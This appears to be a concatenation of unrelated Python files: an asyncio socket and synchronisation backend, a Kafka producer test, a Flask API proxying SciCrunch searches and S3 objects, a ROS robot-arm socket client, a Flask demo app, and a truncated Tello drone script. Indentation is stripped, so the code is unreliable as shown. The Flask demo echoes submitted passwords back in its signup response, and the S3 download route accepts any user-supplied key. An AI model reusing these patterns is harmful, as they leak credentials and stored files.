def data_received(self, data: bytes) -> None:
self.read_queue.append(data)
self.read_event.set()
def eof_received(self) -> Optional[bool]:
self.read_event.set()
return None
def pause_writing(self) -> None:
self.write_event.clear()
def resume_writing(self) -> None:
self.write_event.set()
class DatagramProtocol(asyncio.DatagramProtocol):
read_queue: Deque[Tuple[bytes, IPSockAddrType]]
read_event: asyncio.Event
write_event: asyncio.Event
exception: Optional[Exception] = None
def connection_made(self, transport: asyncio.BaseTransport) -> None:
self.read_queue = deque(maxlen=100) # arbitrary value
self.read_event = asyncio.Event()
self.write_event = asyncio.Event()
self.write_event.set()
def connection_lost(self, exc: Optional[Exception]) -> None:
self.read_event.set()
self.write_event.set()
def datagram_received(self, data: bytes, addr: IPSockAddrType) -> None:
addr = convert_ipv6_sockaddr(addr)
self.read_queue.append((data, addr))
self.read_event.set()
def error_received(self, exc: Exception) -> None:
self.exception = exc
def pause_writing(self) -> None:
self.write_event.clear()
def resume_writing(self) -> None:
self.write_event.set()
class SocketStream(abc.SocketStream):
def __init__(self, transport: asyncio.Transport, protocol: StreamProtocol):
self._transport = transport
self._protocol = protocol
self._receive_guard = ResourceGuard('reading from')
self._send_guard = ResourceGuard('writing to')
self._closed = False
async def receive(self, max_bytes: int = 65536) -> bytes:
with self._receive_guard:
await checkpoint()
if not self._protocol.read_queue and not self._transport.is_closing():
self._protocol.read_event.clear()
self._transport.resume_reading()
await self._protocol.read_event.wait()
self._transport.pause_reading()
try:
chunk = self._protocol.read_queue.popleft()
except IndexError:
if self._closed:
raise ClosedResourceError from None
elif self._protocol.exception:
raise BrokenResourceError from self._protocol.exception
else:
raise EndOfStream
if len(chunk) > max_bytes:
# Split the oversized chunk
chunk, leftover = chunk[:max_bytes], chunk[max_bytes:]
self._protocol.read_queue.appendleft(leftover)
return chunk
async def send(self, item: bytes) -> None:
with self._send_guard:
await checkpoint()
try:
self._transport.write(item)
except RuntimeError as exc:
if self._closed:
raise ClosedResourceError from None
elif self._transport.is_closing():
raise BrokenResourceError from exc
else:
raise
await self._protocol.write_event.wait()
async def send_eof(self) -> None:
try:
self._transport.write_eof()
except OSError:
pass
async def aclose(self) -> None:
if not self._transport.is_closing():
self._closed = True
try:
self._transport.write_eof()
except OSError:
pass
self._transport.close()
await asyncio.sleep(0)
self._transport.abort()
@property
def raw_socket(self) -> socket.socket:
return self._transport.get_extra_info('socket')
class SocketListener(abc.SocketListener):
def __init__(self, raw_socket: socket.SocketType):
self._raw_socket = raw_socket
self._loop = cast(asyncio.BaseEventLoop, get_running_loop())
self._accept_guard = ResourceGuard('accepting connections from')
@property
def raw_socket(self) -> socket.socket:
return self._raw_socket
async def accept(self) -> abc.SocketStream:
with self._accept_guard:
await checkpoint()
try:
client_sock, _addr = await self._loop.sock_accept(self._raw_socket)
except asyncio.CancelledError:
# Workaround for https://bugs.python.org/issue41317
try:
self._loop.remove_reader(self._raw_socket)
except NotImplementedError:
pass
raise
if client_sock.family in (socket.AF_INET, socket.AF_INET6):
client_sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
transport, protocol = await self._loop.connect_accepted_socket(StreamProtocol, client_sock)
return SocketStream(cast(asyncio.Transport, transport), cast(StreamProtocol, protocol))
async def aclose(self) -> None:
self._raw_socket.close()
class UDPSocket(abc.UDPSocket):
def __init__(self, transport: asyncio.DatagramTransport, protocol: DatagramProtocol):
self._transport = transport
self._protocol = protocol
self._receive_guard = ResourceGuard('reading from')
self._send_guard = ResourceGuard('writing to')
self._closed = False
async def aclose(self) -> None:
if not self._transport.is_closing():
self._closed = True
self._transport.close()
@property
def raw_socket(self) -> socket.socket:
return self._transport.get_extra_info('socket')
async def receive(self) -> Tuple[bytes, IPSockAddrType]:
with self._receive_guard:
await checkpoint()
# If the buffer is empty, ask for more data
if not self._protocol.read_queue and not self._transport.is_closing():
self._protocol.read_event.clear()
await self._protocol.read_event.wait()
try:
return self._protocol.read_queue.popleft()
except IndexError:
if self._closed:
raise ClosedResourceError from None
else:
raise BrokenResourceError from None
async def send(self, item: UDPPacketType) -> None:
with self._send_guard:
await checkpoint()
await self._protocol.write_event.wait()
if self._closed:
raise ClosedResourceError
elif self._transport.is_closing():
raise BrokenResourceError
else:
self._transport.sendto(*item)
class ConnectedUDPSocket(abc.ConnectedUDPSocket):
def __init__(self, transport: asyncio.DatagramTransport, protocol: DatagramProtocol):
self._transport = transport
self._protocol = protocol
self._receive_guard = ResourceGuard('reading from')
self._send_guard = ResourceGuard('writing to')
self._closed = False
async def aclose(self) -> None:
if not self._transport.is_closing():
self._closed = True
self._transport.close()
@property
def raw_socket(self) -> SocketType:
return self._transport.get_extra_info('socket')
async def receive(self) -> bytes:
with self._receive_guard:
await checkpoint()
# If the buffer is empty, ask for more data
if not self._protocol.read_queue and not self._transport.is_closing():
self._protocol.read_event.clear()
await self._protocol.read_event.wait()
try:
packet = self._protocol.read_queue.popleft()
except IndexError:
if self._closed:
raise ClosedResourceError from None
else:
raise BrokenResourceError from None
return packet[0]
async def send(self, item: bytes) -> None:
with self._send_guard:
await checkpoint()
await self._protocol.write_event.wait()
if self._closed:
raise ClosedResourceError
elif self._transport.is_closing():
raise BrokenResourceError
else:
self._transport.sendto(item)
async def connect_tcp(host: str, port: int,
local_addr: Optional[Tuple[str, int]] = None) -> SocketStream:
transport, protocol = cast(
Tuple[asyncio.Transport, StreamProtocol],
await get_running_loop().create_connection(StreamProtocol, host, port,
local_addr=local_addr)
)
transport.pause_reading()
return SocketStream(transport, protocol)
async def connect_unix(path: str) -> SocketStream:
transport, protocol = cast(
Tuple[asyncio.Transport, StreamProtocol],
await get_running_loop().create_unix_connection(StreamProtocol, path)
)
transport.pause_reading()
return SocketStream(transport, protocol)
async def create_udp_socket(
family: socket.AddressFamily,
local_address: Optional[IPSockAddrType],
remote_address: Optional[IPSockAddrType],
reuse_port: bool
) -> Union[UDPSocket, ConnectedUDPSocket]:
result = await get_running_loop().create_datagram_endpoint(
DatagramProtocol, local_addr=local_address, remote_addr=remote_address, family=family,
reuse_port=reuse_port)
transport = cast(asyncio.DatagramTransport, result[0])
protocol = cast(DatagramProtocol, result[1])
if protocol.exception:
transport.close()
raise protocol.exception
if not remote_address:
return UDPSocket(transport, protocol)
else:
return ConnectedUDPSocket(transport, protocol)
async def getaddrinfo(host: Union[bytearray, bytes, str], port: Union[str, int, None], *,
family: Union[int, AddressFamily] = 0, type: Union[int, SocketKind] = 0,
proto: int = 0, flags: int = 0) -> GetAddrInfoReturnType:
# https://github.com/python/typeshed/pull/4304
result = await get_running_loop().getaddrinfo(
host, port, family=family, type=type, proto=proto, flags=flags) # type: ignore[arg-type]
return cast(GetAddrInfoReturnType, result)
async def getnameinfo(sockaddr: IPSockAddrType, flags: int = 0) -> Tuple[str, str]:
# https://github.com/python/typeshed/pull/4305
result = await get_running_loop().getnameinfo(sockaddr, flags)
return cast(Tuple[str, str], result)
async def wait_socket_readable(sock: socket.SocketType) -> None:
await checkpoint()
if _read_events.get(sock):
raise BusyResourceError('reading from') from None
loop = get_running_loop()
event = _read_events[sock] = asyncio.Event()
get_running_loop().add_reader(sock, event.set)
try:
await event.wait()
finally:
if _read_events.pop(sock, None) is not None:
loop.remove_reader(sock)
readable = True
else:
readable = False
if not readable:
raise ClosedResourceError
async def wait_socket_writable(sock: socket.SocketType) -> None:
await checkpoint()
if _write_events.get(sock):
raise BusyResourceError('writing to') from None
loop = get_running_loop()
event = _write_events[sock] = asyncio.Event()
loop.add_writer(sock.fileno(), event.set)
try:
await event.wait()
finally:
if _write_events.pop(sock, None) is not None:
loop.remove_writer(sock)
writable = True
else:
writable = False
if not writable:
raise ClosedResourceError
#
# Synchronization
#
class Lock(abc.Lock):
def __init__(self):
self._lock = asyncio.Lock()
def locked(self) -> bool:
return self._lock.locked()
async def acquire(self) -> None:
await checkpoint()
await self._lock.acquire()
async def release(self) -> None:
self._lock.release()
class Condition(abc.Condition):
def __init__(self, lock: Optional[Lock]):
asyncio_lock = lock._lock if lock else None
self._condition = asyncio.Condition(asyncio_lock)
async def acquire(self) -> None:
await checkpoint()
await self._condition.acquire()
async def release(self) -> None:
self._condition.release()
def locked(self) -> bool:
return self._condition.locked()
async def notify(self, n=1):
self._condition.notify(n)
async def notify_all(self):
self._condition.notify_all()
async def wait(self):
await checkpoint()
return await self._condition.wait()
class Event(abc.Event):
def __init__(self):
self._event = asyncio.Event()
async def set(self):
self._event.set()
def is_set(self) -> bool:
return self._event.is_set()
async def wait(self):
await checkpoint()
await self._event.wait()
class Semaphore(abc.Semaphore):
def __init__(self, value: int):
self._semaphore = asyncio.Semaphore(value)
async def acquire(self) -> None:
await checkpoint()
await self._semaphore.acquire()
async def release(self) -> None:
self._semaphore.release()
@property
def value(self):
return self._semaphore._value
class CapacityLimiter(abc.CapacityLimiter):
def __init__(self, total_tokens: float):
self._set_total_tokens(total_tokens)
self._borrowers: Set[Any] = set()
self._wait_queue: Dict[Any, asyncio.Event] = OrderedDict()
async def __aenter__(self):
await self.acquire()
async def __aexit__(self, exc_type: Optional[Type[BaseException]],
exc_val: Optional[BaseException],
exc_tb: Optional[TracebackType]) -> None:
await self.release()
def _set_total_tokens(self, value: float) -> None:
if not isinstance(value, int) and not math.isinf(value):
raise TypeError('total_tokens must be an int or math.inf')
if value < 1:
raise ValueError('total_tokens must be >= 1')
self._total_tokens = value
@property
def total_tokens(self) -> float:
return self._total_tokens
async def set_total_tokens(self, value: float) -> None:
old_value = self._total_tokens
self._set_total_tokens(value)
events = []
for event in self._wait_queue.values():
if value <= old_value:
break
if not event.is_set():
events.append(event)
old_value += 1
for event in events:
event.set()
@property
def borrowed_tokens(self) -> int:
return len(self._borrowers)
@property
def available_tokens(self) -> float:
return self._total_tokens - len(self._borrowers)
async def acquire_nowait(self) -> None:
await self.acquire_on_behalf_of_nowait(current_task())
async def acquire_on_behalf_of_nowait(self, borrower) -> None:
if borrower in self._borrowers:
raise RuntimeError("this borrower is already holding one of this CapacityLimiter's "
"tokens")
if self._wait_queue or len(self._borrowers) >= self._total_tokens:
raise WouldBlock
self._borrowers.add(borrower)
async def acquire(self) -> None:
return await self.acquire_on_behalf_of(current_task())
async def acquire_on_behalf_of(self, borrower) -> None:
try:
await self.acquire_on_behalf_of_nowait(borrower)
except WouldBlock:
event = asyncio.Event()
self._wait_queue[borrower] = event
try:
await event.wait()
except BaseException:
self._wait_queue.pop(borrower, None)
raise
self._borrowers.add(borrower)
async def release(self) -> None:
await self.release_on_behalf_of(current_task())
async def release_on_behalf_of(self, borrower) -> None:
try:
self._borrowers.remove(borrower)
except KeyError:
raise RuntimeError("this borrower isn't holding any of this CapacityLimiter's "
"tokens") from None
# Notify the next task in line if this limiter has free capacity now
if self._wait_queue and len(self._borrowers) < self._total_tokens:
event = self._wait_queue.popitem()[1]
event.set()
def current_default_thread_limiter():
return _default_thread_limiter
_default_thread_limiter = CapacityLimiter(40)
#
# Operating system signals
#
@asynccontextmanager
async def open_signal_receiver(*signals: int):
async def process_signal_queue():
while True:
signum = await queue.get()
yield signum
loop = get_running_loop()
queue = asyncio.Queue() # type: asyncio.Queue[int]
handled_signals = set()
agen = process_signal_queue()
try:
for sig in set(signals):
loop.add_signal_handler(sig, queue.put_nowait, sig)
handled_signals.add(sig)
yield agen
finally:
await agen.aclose()
for sig in handled_signals:
loop.remove_signal_handler(sig)
#
# Testing and debugging
#
def _create_task_info(task: asyncio.Task) -> TaskInfo:
task_state = _task_states.get(task)
if task_state is None:
name = task.get_name() if _native_task_names else None # type: ignore
parent_id = None
else:
name = task_state.name
parent_id = task_state.parent_id
return TaskInfo(id(task), parent_id, name, task._coro) # type: ignore
async def get_current_task() -> TaskInfo:
return _create_task_info(current_task()) # type: ignore
async def get_running_tasks() -> List[TaskInfo]:
return [_create_task_info(task) for task in all_tasks() if not task.done()]
async def wait_all_tasks_blocked() -> None:
this_task = current_task()
while True:
for task in all_tasks():
if task is this_task:
continue
if isgenerator(task._coro): # type: ignore
awaitable = task._coro.gi_yieldfrom # type: ignore
else:
awaitable = task._coro.cr_await # type: ignore
# If the first awaitable is None, the task has not started running yet
task_running = bool(awaitable)
# Consider any task doing sleep(0) as not being blocked
while asyncio.iscoroutine(awaitable):
if isgenerator(awaitable):
code = awaitable.gi_code
f_locals = awaitable.gi_frame.f_locals
awaitable = awaitable.gi_yieldfrom
else:
code = awaitable.cr_code
f_locals = awaitable.cr_frame.f_locals
awaitable = awaitable.cr_await
if code is asyncio.sleep.__code__ and f_locals['delay'] == 0:
task_running = False
break
if not task_running:
await sleep(0.1)
break
else:
return
class TestRunner(abc.TestRunner):
def __init__(self, debug: bool = False, use_uvloop: bool = True,
policy: Optional[asyncio.AbstractEventLoopPolicy] = None):
_maybe_set_event_loop_policy(policy, use_uvloop)
self._loop = asyncio.new_event_loop()
self._loop.set_debug(debug)
asyncio.set_event_loop(self._loop)
def _cancel_all_tasks(self):
to_cancel = all_tasks(self._loop)
if not to_cancel:
return
for task in to_cancel:
task.cancel()
self._loop.run_until_complete(
asyncio.gather(*to_cancel, loop=self._loop, return_exceptions=True))
for task in to_cancel:
if task.cancelled():
continue
if task.exception() is not None:
raise task.exception()
def close(self) -> None:
try:
self._cancel_all_tasks()
self._loop.run_until_complete(self._loop.shutdown_asyncgens())
finally:
asyncio.set_event_loop(None)
self._loop.close()
def call(self, func: Callable[..., Awaitable], *args, **kwargs):
return self._loop.run_until_complete(func(*args, **kwargs))
|
test_producer.py
|
import os
import json
import pytest
import requests_mock
import time
import threading
from producer import Producer
from kafka import KafkaConsumer
default_config = [
{"url": "https://developers.italia.it", "regexp": "data"},
{"url": "https://oruga.io"},
{"url": "https://buefy.org", "regexp": "Vue"},
]
@pytest.fixture
def create_json_config():
config_file = "./config.json"
f = open("./config.json", "w")
f.write(json.dumps(default_config))
f.close()
yield None
os.remove(config_file)
def test_producer_creates_objects(create_json_config, kafka_admin_client):
kafka_admin_client.delete_topics(["reports"])
producer = Producer()
def launch_producer():
producer.connect()
with requests_mock.Mocker() as m:
m.get("https://developers.italia.it", text="data")
m.get("https://oruga.io", text="data")
m.get("https://buefy.org", text="data")
producer.start()
launcher = threading.Thread(target=launch_producer)
launcher.start()
time.sleep(10)
consumer = KafkaConsumer(
"reports",
bootstrap_servers=[f"{os.getenv('KAFKA_HOST', 'localhost:29092')}"],
api_version=(0, 10),
auto_offset_reset="earliest",
enable_auto_commit=False,
consumer_timeout_ms=5000,
)
producer.stop()
for msg in consumer:
site_stat = json.loads(msg.value)
key = msg.key.decode("utf-8")
if key == "https://developers.italia.it":
assert site_stat["content_check"] is True
if key == "https://oruga.io":
assert site_stat["content_check"] is True
if key == "https://buefy.org":
assert site_stat["content_check"] is False
assert site_stat["status_code"] == 200
assert site_stat["time"] > 0
|
main.py
|
import json
import base64
import logging
from threading import Lock
from datetime import datetime, timedelta
import boto3
import requests
from botocore.exceptions import ClientError
from flask import Flask, abort, jsonify, request
from flask_cors import CORS
from flask_marshmallow import Marshmallow
from blackfynn import Blackfynn
from app.config import Config
from blackfynn import Blackfynn
from app.process_kb_results import process_kb_results_recursive
# from pymongo import MongoClient
import schedule
import threading
import time
from timeit import default_timer as timer
app = Flask(__name__)
# set environment variable
app.config["ENV"] = Config.DEPLOY_ENV
CORS(app)
times = []
def schedule_check():
while True:
schedule.run_pending()
time.sleep(1)
@app.route("/search/", defaults={'query': ''})
@app.route("/search/<query>")
def kb_search(query):
try:
response = requests.get(f'https://scicrunch.org/api/1/elastic/SPARC_Datasets_new/_search?q={query}&api_key={Config.KNOWLEDGEBASE_KEY}')
return process_kb_results_recursive(response.json())
except requests.exceptions.HTTPError as err:
logging.error(err)
return json.dumps({'error': err})
def heart_query():
start = timer()
resp = kb_search('heart')
global times
try:
number_hits = json.loads(resp)['numberOfHits']
except:
number_hits = 'Error in query'
times.append({'time run': time.strftime('%X %x %Z'), 'time elapsed': timer() - start, 'results': number_hits })
schedule.every().minute.do(heart_query)
heart_query()
x = threading.Thread(target=schedule_check, daemon=True)
x.start()
@app.errorhandler(404)
def resource_not_found(e):
return jsonify(error=str(e)), 404
@app.before_first_request
def connect_to_blackfynn():
global bf
bf = Blackfynn(
api_token=Config.BLACKFYNN_API_TOKEN,
api_secret=Config.BLACKFYNN_API_SECRET,
env_override=False,
)
# @app.before_first_request
# def connect_to_mongodb():
# global mongo
# mongo = MongoClient(Config.MONGODB_URI)
@app.route("/scicrunch-test")
def scitest():
global times
return jsonify({"Tests": times}), 200
@app.route("/health")
def health():
return json.dumps({"status": "healthy"})
# Download a file from S3
@app.route("/download")
def create_presigned_url(expiration=3600):
bucket_name = "blackfynn-discover-use1"
key = request.args.get("key")
response = s3.generate_presigned_url(
"get_object",
Params={"Bucket": bucket_name, "Key": key, "RequestPayer": "requester"},
ExpiresIn=expiration,
)
return response
# Reverse proxy for objects from S3, a simple get object
# operation. This is used by scaffoldvuer and its
# important to keep the relative <path> for accessing
# other required files.
@app.route("/s3-resource/<path:path>")
def direct_download_url(path):
bucket_name = "blackfynn-discover-use1"
head_response = s3.head_object(
Bucket=bucket_name,
Key=path,
RequestPayer="requester",
)
content_length = head_response.get('ContentLength', None)
if content_length and content_length > 20971520: # 20 MB
return abort(413, description=f"File too big to download: {content_length}")
response = s3.get_object(
Bucket=bucket_name,
Key=path,
RequestPayer="requester",
)
resource = response["Body"].read()
return resource
@app.route("/filter-search/", defaults={'query': ''})
@app.route("/filter-search/<query>/")
def filter_search(query):
term = request.args.get('term')
facet = request.args.get('facet')
size = request.args.get('size')
start = request.args.get('start')
if size is None or start is None:
size = 20
start = 0
print('term', term)
print('facet', facet)
type_map = {
'species': ['organisms.subject.species.name', 'organisms.sample.species.name'],
'gender': ['attributes.subject.sex.value', 'attributes.sample.sex.value'],
'genotype': ['anatomy.organ.name.aggregate']
}
data = {
"size": size,
"from": start,
"query": {
"bool": {
"must": [],
"should": [],
"filter":
{
'term': {}
}
}
}
}
results = []
if term is not None and facet is not None:
data['query']['bool']['filter']['term'] = {f'{type_map[term][0]}': f'{facet}'}
else:
data['query']['bool']['filter'] = []
params = {}
if query is not '':
if term is None:
params = {'q': query}
else:
data['query']['bool']['must'] = {
"query_string": {
"query": f"{query}",
"default_operator": "and",
"lenient": "true",
"type": "best_fields"
}
}
try:
print(data)
response = requests.get(
f'https://scicrunch.org/api/1/elastic/SPARC_Datasets_new/_search?api_key={Config.KNOWLEDGEBASE_KEY}',
params=params,
json=data)
results = process_kb_results_recursive(response.json())
except requests.exceptions.HTTPError as err:
logging.error(err)
return json.dumps({'error': err})
return results
@app.route("/get-facets/<type>")
def get_facets(type):
type_map = {
'species': ['organisms.subject.species.name.aggregate', 'organisms.sample.species.name.aggregate'],
'gender': ['attributes.subject.sex.value'],
'genotype': ['anatomy.organ.name.aggregate']
}
data = {
"from": 0,
"size": 0,
"aggregations": {
f"{type}": {
"terms": {
"field": "",
"size": 200,
"order": [
{
"_count": "desc"
},
{
"_key": "asc"
}
]
}
}
}
}
results = []
for path in type_map[type]:
data['aggregations'][f'{type}']['terms']['field'] = path
response = requests.get(
f'https://scicrunch.org/api/1/elastic/SPARC_Datasets_new/_search?api_key={Config.KNOWLEDGEBASE_KEY}',
json=data)
results.append(response.json())
terms = []
for result in results:
terms += result['aggregations'][f'{type}']['buckets']
return json.dumps(terms)
@app.route("/banner/<dataset_id>")
def get_banner(dataset_id):
try:
params = {
'includePublishedDataset': True,
'api_key': bf._api.token
}
response = requests.get(f'https://api.blackfynn.io/datasets/{dataset_id}', params=params)
discover_id = response.json()['publication']['publishedDataset']['id']
response = requests.get(f'{Config.DISCOVER_API_HOST}/datasets/{discover_id}')
return response.json()
except requests.exceptions.HTTPError as err:
logging.error(err)
return json.dumps({'error': err})
|
Hiwin_RT605_Socket_v3_20190628113341.py
|
#!/usr/bin/env python3
# license removed for brevity
import rospy
import os
import socket
##多執行序
import threading
import time
import sys
import matplotlib as plot
import HiwinRA605_socket_TCPcmd_v3 as TCP
import HiwinRA605_socket_Taskcmd_v3 as Taskcmd
import numpy as np
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
from std_msgs.msg import Int32MultiArray
import math
import enum
#Socket = 0
#data = '0' #設定傳輸資料初始值
Arm_feedback = 1 #假設手臂忙碌
NAME = 'socket_server'
arm_mode_flag = False
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0.0,36.8,11.35,-90.0,0.0,0.0)
##------------class socket_cmd---------
class socket_data():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
socket_cmd = socket_data(0,0.0,0,0,0,0,0)
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
raise StopIteration
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
##-----------client feedback arm state----------
class StateFeedback():
def __init__(self,ArmState,SentFlag):
self.ArmState = ArmState
self.SentFlag = SentFlag
state_feedback = StateFeedback(0,0)
class client():
def __init__(self):
self.get_connect()
def get_connect(self):
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.s.connect(('192.168.0.1', 8080))
def send(self, msg):
self.s.send(msg.encode('utf-8')) #用utf-8來encode,還有其他encode的方法,str用utf-8就OK!
def get_recieve(self):
data = self.s.recv(1024) #1024指定buffer的大小,限制一次收多少
data.decode('utf-8')
return data
def close(self):
self.s.close()
Socket = client()
def point_data(x,y,z,pitch,roll,yaw): ##接收策略端傳送位姿資料
pos.x = '%s'%x
pos.y = '%s'%y
pos.z = '%s'%z
pos.pitch = '%s'%pitch
pos.roll = '%s'%roll
pos.yaw = '%s'%yaw
##----------Arm Mode-------------###
def Arm_Mode(action,grip,ra,setvel,setboth): ##接收策略端傳送手臂模式資料
global arm_mode_flag
socket_cmd.action = int('%s'%action)
socket_cmd.grip = int('%s'%grip)
socket_cmd.ra = int('%s'%ra)
socket_cmd.setvel = int('%s'%setvel)
socket_cmd.setboth = int('%s'%setboth)
arm_mode_flag = True
Socket_command()
##-------Arm Speed Mode------------###
def Speed_Mode(speedmode): ##接收策略端傳送手臂模式資料
socket_cmd.Speedmode = int('%s'%speedmode)
def socket_talker(): ##創建Server node
pub = rospy.Publisher('chatter', Int32MultiArray, queue_size=10)
rospy.init_node(NAME)
rate = rospy.Rate(200) # 10hz
print ("Ready to connect")
while not rospy.is_shutdown():
# hello_str = "hello world %s" % rospy.get_time()
state = Int32MultiArray()
state.data = [state_feedback.ArmState,state_feedback.SentFlag]
pub.publish(state)
rate.sleep()
##----------socket 封包傳輸--------------##
##---------------socket 傳輸手臂命令-----------------
def Socket_command():
global Socket
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
#-------設定手臂速度--------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
#-------設定手臂Delay時間--------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
#-------設定手臂急速&安全模式--------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
socket_cmd.action= 6 ##切換初始mode狀態
Socket.send(data)
##-----------socket client--------
def socket_client():
global Socket
try:
#Socket = client()
#Socket.get_connect()
#print("Socket_client :",dir(Socket))
#Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#Socket.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
print('Connection has been successful')
except socket.error as msg:
print(msg)
sys.exit(1)
#print('Connection has been successful')
Socket_feedback(Socket)
rospy.on_shutdown(myhook)
Socket.close()
def Socket_feedback(s):
Socket = s
while 1:
feedback_str = Socket.get_recieve()
#手臂端傳送手臂狀態
if str(feedback_str[2]) == '48':# F 手臂為Ready狀態準備接收下一個運動指令
state_feedback.ArmState = 0
if str(feedback_str[2]) == '49':# T 手臂為忙碌狀態無法執行下一個運動指令
state_feedback.ArmState = 1
if str(feedback_str[2]) == '54':# 6 策略完成
state_feedback.ArmState = 6
print("shutdown")
#確認傳送旗標
if str(feedback_str[4]) == '48':#回傳0 false
state_feedback.SentFlag = 0
if str(feedback_str[4]) == '49':#回傳1 true
state_feedback.SentFlag = 1
##---------------socket 傳輸手臂命令 end-----------------
if state_feedback.ArmState == Taskcmd.Arm_feedback_Type.shutdown:
break
##-----------socket client end--------
##-------------socket 封包傳輸 end--------------##
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 6##切換初始mode狀態
## 多執行緒
t = threading.Thread(target=socket_client)
t.start() # 開啟多執行緒
#time.sleep(1)
try:
socket_talker()
except rospy.ROSInterruptException:
pass
t.join()
## 多執行序 end
|
app.py
|
from flask import Flask, abort, request, render_template, json, jsonify
app = Flask(__name__)
app.static_folder = 'static'
@app.before_request
def limit_remote_addr():
if request.remote_addr != '127.0.0.1':
abort(403) # Forbidden
@app.route('/')
def hello():
return render_template('index.html')
@app.route('/test2')
def hello2():
return render_template('test2.html')
@app.route('/signup')
def signup():
return render_template('signup.html')
@app.route('/signupuser', methods=['POST', 'GET'])
def signupuser():
user = request.form['username'];
password = request.form['password'];
return json.dumps({'status':'OK','user':user,'pass':password});
@app.route('/_add_numbers')
def add_numbers():
a = request.args.get('a', 0, type=int)
b = request.args.get('b', 0, type=int)
return jsonify(result=a + b)
@app.route('/noisefloor')
def index():
return render_template('noisefloor.html')
@app.route('/sliderdata', methods=['POST'])
def sliderdata():
data = request.form['data']
#do something else here if necessary
return ('', 200)
@app.route('/numberdata', methods=['POST'])
def numberdata():
data1 = request.json.get('value1')
data2 = request.json.get('value2')
length = "--"
response='ok - got {} and {} --- Message Queue Inhalt: {}'.format(data1, data2, length)
#do something else here, too, if necessary
return jsonify(status=response)
class StatusMessages:
def __init__(self, instance, max_delay):
from random import randint
from threading import Thread
self.t = Thread(target=self.__worker, args=())
self.max_delay = max_delay
self.instance = instance
self.delay = randint(0, self.max_delay)
self.statusmessage1 = "Meldung 1 von " + self.instance
self.statusmessage2 = "Meldung 2"
self.statusmessage3 = "Meldung 3"
self.statusmessage4 = "Meldung 4"
self.counter = 0
self.__update()
def add(self, newmessage):
self.statusmessage4 = self.statusmessage3
self.statusmessage3 = self.statusmessage2
self.statusmessage2 = self.statusmessage1
self.statusmessage1 = newmessage
#print("Nach " + str(newmessage) + " Sekunden eine Meldung hinzugefuegt.\n")
def __update(self):
self.t.start()
def __worker(self):
import time
from random import randint
self.add(self.delay)
self.counter += 1
print(" ---- " + self.instance + " ---- Counter: " + str(self.counter) + " ----")
print("Meldung 1: " + str(self.statusmessage1) )
print("Meldung 2: " + str(self.statusmessage2) )
print("Meldung 3: " + str(self.statusmessage3) )
print("Meldung 4: " + str(self.statusmessage4) + "\n")
time.sleep(self.delay)
self.delay = randint(0, self.max_delay)
from threading import Thread
self.t = Thread(target=self.__worker, args=())
self.__update()
sm = StatusMessages("sm", 5)
sm2 = StatusMessages("sm2", 3)
if __name__ == '__main__':
#app.run(debug=True, threaded=True)
sm.add("Testnachricht")
sm2.add("Nachricht aus dem zweiten Objekt")
|
fly_test.py
|
from time import sleep
from tello import Tello
import threading
def _telloA():
tello = Tello('192.168.50.201',8889)
tello.send_command('command')
sleep(1)
tello.send_command('speed 80')
sleep(1)
tello.send_command('battery?')
sleep(1)
tello.send_command('takeoff')
sleep(2)
tello.send_command('up 150')
sleep(1)
for i in range(2):
tello.send_command('forward 200')
sleep(1)
tello.send_command('left 200')
sleep(1)
tello.send_command('back 200')
